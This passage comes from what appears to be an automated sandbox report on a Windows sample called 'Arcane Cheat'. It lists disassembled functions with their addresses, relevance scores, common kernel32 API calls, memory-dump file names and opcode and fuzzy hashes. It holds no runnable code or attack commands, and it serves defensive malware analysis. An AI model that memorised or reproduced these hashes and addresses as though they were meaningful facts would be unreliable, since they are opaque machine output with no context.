                                  • Opcode ID: b8402a302daa8334adc34e4ed6c427cb214b5c209cffb60726cd4985e638dd23
                                  • Instruction ID: e882aa8c0474ac6839edbff5992ca025a5f9fc4ace18a7865dc8abf254ce078b
                                  • Opcode Fuzzy Hash: b8402a302daa8334adc34e4ed6c427cb214b5c209cffb60726cd4985e638dd23
                                  • Instruction Fuzzy Hash: 4DD0C9393C8316BFEA110A74DC06F2B7BA4B755B87F308514B366E90E0EA7090649629
                                  Function 00851194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0085118F,?,?,00000008,?,?,00850E2F,00000000), ref: 008513C1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  • Opcode ID: 02afc1f962d12c84618db7cd7c8879aea4007c109d742e3e647f5f58aaa91e4c
                                  • Instruction ID: 763bbe151d60b85555d94b4bd57b69bbe6d331c049efc1de7bc962cf851188a7
                                  • Opcode Fuzzy Hash: 02afc1f962d12c84618db7cd7c8879aea4007c109d742e3e647f5f58aaa91e4c
                                  • Instruction Fuzzy Hash: 9FB17D35610608DFDB15CF28C48ABA57BE1FF0536AF258698EC99CF2A1C335E985CB44
                                  Function 0082407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: gj
                                  • API String ID: 0-4203073231
                                  • Opcode ID: 95381a61aceb77f3952d076ef5a7470aac5a6daacb74fb771e1cb3c84143ecd1
                                  • Instruction ID: aa4c698c304b4d9da4e063424c9c2839135407435635db6bee82c2119f73cb8c
                                  • Opcode Fuzzy Hash: 95381a61aceb77f3952d076ef5a7470aac5a6daacb74fb771e1cb3c84143ecd1
                                  • Instruction Fuzzy Hash: 87F1D2B2A083418FC348CF29D880A5AFBE1BFCC248F15892EF598D7711E634E9558B56
                                  Function 0082ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0082AD1A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  • Opcode ID: 3ab3291ce2fd20b9e4faf6f7868f51e750e02d15673d3c42d52dc0f6f246a6ab
                                  • Instruction ID: e0e6b112b25a9724b47750855ae852352a48c8d115e82ebec3b2637fda427a2a
                                  • Opcode Fuzzy Hash: 3ab3291ce2fd20b9e4faf6f7868f51e750e02d15673d3c42d52dc0f6f246a6ab
                                  • Instruction Fuzzy Hash: CDF01DB0D0031C8BCB28CF18EC41AEA73B5FB58715F201295D91583794D7B4AE808E55
                                  Function 0083F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0083EAC5), ref: 0083F068
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: ec09cd3d924ca30294e59c779d25eb419e3e14ac93cdc9aff728a8fad17a619c
                                  • Instruction ID: 3324bf9347049256b0b7ed6c07979d0ba4e25a9af0caaf328172dc449f282bb1
                                  • Opcode Fuzzy Hash: ec09cd3d924ca30294e59c779d25eb419e3e14ac93cdc9aff728a8fad17a619c
                                  • Instruction Fuzzy Hash:
                                  Function 0084B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  • Opcode ID: 069fe5b2317c69f02eef69f4f1ba0b78627685e16eaeb272bede9a8b8399cc70
                                  • Instruction ID: 633aa3bf1f534bca179c044f73d007111ec0dff4442f0d26dd02431a0224606c
                                  • Opcode Fuzzy Hash: 069fe5b2317c69f02eef69f4f1ba0b78627685e16eaeb272bede9a8b8399cc70
                                  • Instruction Fuzzy Hash: CBA001B56416018B9B40CF7AAA0D2093AAEBA556D27198269B549C6160EA2885619F01
                                  Function 00835C77 Relevance: .8, Instructions: 800COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                  • Instruction ID: 80f02c95f7a97447f780358e895aacbbc3cb5d087f3774431e5ec681f504bd97
                                  • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                  • Instruction Fuzzy Hash: 31621631604B899FCB29CF28C8906B9BBE1FF95304F14C56DD89BCB342E634A955CB94
                                  Function 008370BF Relevance: .8, Instructions: 773COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                  • Instruction ID: f778170f52cf42dec941ae45788b5585dd1acbcd0b0cbefed6bc64b6692e48ca
                                  • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                  • Instruction Fuzzy Hash: B86214B160878A9FC729CF28C8906A9FBE1FF95308F14866DD896C7742D730E955CB81
                                  Function 0082ED14 Relevance: .7, Instructions: 694COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                  • Instruction ID: 29eac6370df37fbebc45473dcaa6a10d18acbeb5140effa497a0b02f0bb280f7
                                  • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                  • Instruction Fuzzy Hash: B5524AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597245D734EA19CB86
                                  Function 00836A7B Relevance: .5, Instructions: 509COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05d7728327efb60fb64c16d5fb4ef2529ed8c5c05caa50f59d9d0503ca688671
                                  • Instruction ID: 03cae7b4f35b3bae121d98e3045bd96dca6a58fb6d091da81de33a43130cd9bd
                                  • Opcode Fuzzy Hash: 05d7728327efb60fb64c16d5fb4ef2529ed8c5c05caa50f59d9d0503ca688671
                                  • Instruction Fuzzy Hash: AD12D1B16047069BC728DF2CC9D06B9B7E0FF94308F14892DE597C7A81E774A8A5CB85
                                  Function 0082BE13 Relevance: .4, Instructions: 449COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ebafe7eb01cf6e3e49ef2f166e4a77e58281b4f7d2851509f26dab25d630cd5
                                  • Instruction ID: 087ca7bd2da18cd1b713b61eae845beea1d7ec5064e0a01f20b52f6300a2eaea
                                  • Opcode Fuzzy Hash: 7ebafe7eb01cf6e3e49ef2f166e4a77e58281b4f7d2851509f26dab25d630cd5
                                  • Instruction Fuzzy Hash: 17F186726087259FC718CF29E48496EBBE1FFC9318F148A2EF495D7352D630E9858B42
                                  Function 00840B43 Relevance: .3, Instructions: 345COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction ID: 0a1aa1169b53686b914e1c10f87ce5213ed21b88e39dcdb980ae14812d7bb347
                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction Fuzzy Hash: 97C1913621509B4ADF2D4639857413FFAA1FAA27B132A076DD5B2CB1C5FE30D528DE20
                                  Function 00840F78 Relevance: .3, Instructions: 341COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                  • Instruction ID: 4f29d820e40206ce4c3107e799006ab368a41c30bcb352a2df25f09e61c9ec6f
                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                  • Instruction Fuzzy Hash: 6FC1A5362151A70ADF2D4639C57803FFBA1FAA27B131A176DD4B2CB1C5FE20D564DA20
                                  Function 0084070E Relevance: .3, Instructions: 331COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                  • Instruction ID: b292206c2d670e61c0f15ac697f813ac3f9d7992efeffed3df876ea2d17df843
                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                  • Instruction Fuzzy Hash: 00C161362051A70AEF2D8639857413FBAA1AAA27B131A076DD5B2DB1C5FE30D524DE20
                                  Function 00836646 Relevance: .3, Instructions: 325COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: f7fdf6decf367ef816eccdd086b7d08833987930d729c43cab85e334c51ef25b
                                  • Instruction ID: 41dd7541a3c8e2df98771f370c0824c38e6fb46308d45ed6608aa9a9e2ed8288
                                  • Opcode Fuzzy Hash: f7fdf6decf367ef816eccdd086b7d08833987930d729c43cab85e334c51ef25b
                                  • Instruction Fuzzy Hash: AED190B1A04345AFDB14CF2CC88575ABBE0FF95308F04856DE844DB642E634E969CBD6
                                  Function 008402F6 Relevance: .3, Instructions: 323COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                  • Instruction ID: 5e9e57ee18ad1a82f0a49bdf410040cf1ca08d08d0aecac67ff00512520e7446
                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                  • Instruction Fuzzy Hash: FFC1A2362091970ADF2D463A857403FBAA1FAA27B132A076DD5B3DB1C5FE30D524DE20
                                  Function 0082E2A0 Relevance: .3, Instructions: 318COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 898f3414e853d8bd303f6caa685921c47db711314837da0f19830a0dddeedd0d
                                  • Instruction ID: 1a124d8f9ffbdcb2806bed4598c8d84b4c0f86b6b4206c93207c22e2bd0c4bd0
                                  • Opcode Fuzzy Hash: 898f3414e853d8bd303f6caa685921c47db711314837da0f19830a0dddeedd0d
                                  • Instruction Fuzzy Hash: 42E136B45183948FC304CF29D49096ABBF0BF8A300F86095EF9D587352D375EA19DBA2
                                  Function 00833A3C Relevance: .3, Instructions: 263COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                  • Instruction ID: e8868e9585f81f7c96e3676ea2fa6e183f2cd73a9cc3b5df97723717eaea23b0
                                  • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                  • Instruction Fuzzy Hash: AE9124702047498BDB28EF68D891BBAB395FFD0304F10092DE597D7282DA78A785C792
                                  Function 00844969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56804746d62e0df95466012d06a8a2c0c80b2f30d30084f73fd3289245ee7a39
                                  • Instruction ID: f2a614a049e4e56faed7053d725bd3ffa5f139bebe2057d232679eb99aa55fdf
                                  • Opcode Fuzzy Hash: 56804746d62e0df95466012d06a8a2c0c80b2f30d30084f73fd3289245ee7a39
                                  • Instruction Fuzzy Hash: A8619A71680B1C67DF38C96C4896BBF3784FB11304F142A1AE583DB2D2D651DD42D35A
                                  Function 00833D6D Relevance: .2, Instructions: 232COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
